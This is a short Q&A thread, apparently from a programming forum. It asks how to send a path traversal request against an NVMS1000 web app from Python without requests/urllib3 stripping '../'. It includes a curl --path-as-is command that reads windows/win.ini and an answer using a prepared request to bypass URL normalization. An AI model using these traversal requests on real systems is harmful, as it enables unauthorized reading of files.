Path traversal with python request

Question

recently I wanted to automate an attack for a web app that is prone to path traversal attacks (NVMS1000) via python requests module.

The request works perfectly with curl by using the option path-as-is:

curl --path-as-is http://127.0.0.1/../../../../../../../../../../windows/win.ini

However when using python requests module the "../" where stripped from the urlpath (as I can clearly see e.g. via Burp Suite):

host = "127.0.0.1"
path = "/../../../../../../../../../.."
file = "/windows/win.ini"
url = host+path+file
response = requests.get(url,proxies=proxies)

I checked the docs but did not find any explanation for this behaviour nor found an option to prevent the stripping/normalization similar as the option for curl.

platform is debian, request module is version 2.22.0

Thanks for your help.

oxynoia · Answer 1 · 2020-08-15T09:48:35.553

1

I know I am late, but consider downgrading urllib3:

pip install --upgrade urllib3==1.24.3

Or better yet, you should use prepared requests:

my_url = 'http://127.0.0.1/../../../../../../../../../../windows/win.ini'
s = requests.Session()
r = requests.Request(method='GET', url=my_url)
prep = r.prepare()
prep.url = my_url # actual url you want
response = s.send(prep)

edited Aug 15 '20 at 09:48

answered Aug 15 '20 at 02:48

oxynoia

61
4

Change originates from this PR: https://github.com/urllib3/urllib3/pull/1487 Issue was raised but closed: https://github.com/urllib3/urllib3/issues/1781 – jtpereyda Oct 01 '20 at 17:22

Path traversal with python request

1 Answers1